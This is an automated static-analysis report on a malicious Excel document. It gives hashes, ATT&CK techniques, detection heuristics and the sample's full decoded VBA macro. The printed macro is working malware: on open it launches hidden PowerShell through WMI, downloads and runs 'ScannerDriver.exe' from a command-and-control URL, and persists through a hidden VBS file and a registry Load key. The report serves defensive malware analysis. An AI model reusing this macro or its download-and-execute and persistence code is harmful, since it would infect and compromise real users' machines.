Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f581fb3a381ce783…

MALICIOUS

Office (OLE)

35.5 KB Created: 2017-07-03 18:23:59 Authoring application: Microsoft Excel First seen: 2020-09-24
MD5: dc9ab17664f2274e9c0f7a45afef79d3 SHA-1: 9ededb645f357e8261bd8be47877d8f5e1e7b091 SHA-256: f581fb3a381ce783778728cd1aca7d6a5b6a6ae2d2a33d665ed9fecf78f5c457
570 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1105 Ingress Tool Transfer T1071.001 Web Protocols T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is an Excel document containing a malicious VBA macro with an Auto_Open function. This macro utilizes WScript.Shell and WMI to execute a PowerShell command that downloads a second-stage executable named 'ScannerDriver.exe' from 'http://c2.howielab.com/C2/Agent/20170703142356' and then executes it. The macro also attempts to create a file at 'C:\Users\Public\config.txt', likely for persistence or configuration storage.

Heuristics 14

  • ClamAV: Win.Trojan.PowerShell-6312116-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.PowerShell-6312116-0
  • VBA macros detected medium 8 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
            strComputer = "."
        Shell "wscript C:\Users\Public\config.vbs", vbNormalFocus
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
          a.WriteLine ("Dim objShell")
      a.WriteLine ("Set objShell = WScript.CreateObject(""WScript.Shell"")")
      a.WriteLine ("command = ""C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -ep Bypass -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadFile('http://c2.howielab.com/C2/Agent/20170703142356','ScannerDriver.exe'));Start-Process 'ScannerDriver.exe'""")
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
            Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
        objProcess.Create "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadFile('http://c2.howielab.com/C2/Agent/20170703142356','ScannerDriver.exe'));Start-Process 'ScannerDriver.exe'"
     End Function
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
    Matched line in script
            strComputer = "."
        Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Public Function Persist() As Variant
 Set fs = CreateObject("Scripting.FileSystemObject")
    If Not fs.FileExists("C:\Users\Public\config.txt") Then
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
            strComputer = "."
        Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Attribute VB_Name = "Module1"
Sub Auto_Open()
Execute
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://c2.howielab.com/C2/Agent/20170703142356 In document text (OLE body)
    • http://c2.howielab.com/C2/AgenIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2860 bytes
SHA-256: 6d4634f246cf92f5629873068d95a8e271efd944bc9028a27198cdd965f416b4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub Auto_Open()
Execute
Persist
Reg
Start

End Sub

 Public Function Execute() As Variant
        Const HIDDEN_WINDOW = 0
        strComputer = "."
        Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
         
        Set objStartup = objWMIService.Get("Win32_ProcessStartup")
        Set objConfig = objStartup.SpawnInstance_
        objConfig.ShowWindow = HIDDEN_WINDOW
        Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
        objProcess.Create "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadFile('http://c2.howielab.com/C2/Agent/20170703142356','ScannerDriver.exe'));Start-Process 'ScannerDriver.exe'"
     End Function
     
Public Function Persist() As Variant
 Set fs = CreateObject("Scripting.FileSystemObject")
    If Not fs.FileExists("C:\Users\Public\config.txt") Then
      Set a = fs.CreateTextFile("C:\Users\Public\config.txt", True)
      a.WriteLine ("Dim objShell")
      a.WriteLine ("Set objShell = WScript.CreateObject(""WScript.Shell"")")
      a.WriteLine ("command = ""C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -ep Bypass -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadFile('http://c2.howielab.com/C2/Agent/20170703142356','ScannerDriver.exe'));Start-Process 'ScannerDriver.exe'""")
      a.WriteLine ("objShell.Run command,0")
      a.WriteLine ("Set objShell = Nothing")
      a.Close
      GivenLocation = "C:\Users\Public\"
      OldFileName = "config.txt"
      NewFileName = "config.vbs"
      Name GivenLocation & OldFileName As GivenLocation & NewFileName
      SetAttr "C:\Users\Public\config.vbs", vbHidden
    End If
End Function

Public Function Reg() As Variant
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load", "C:\Users\Public\config.vbs", "REG_SZ"
Set WshShell = Nothing

End Function

Public Function Start() As Variant
 Const HIDDEN_WINDOW = 0
        strComputer = "."
        Shell "wscript C:\Users\Public\config.vbs", vbNormalFocus
      
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.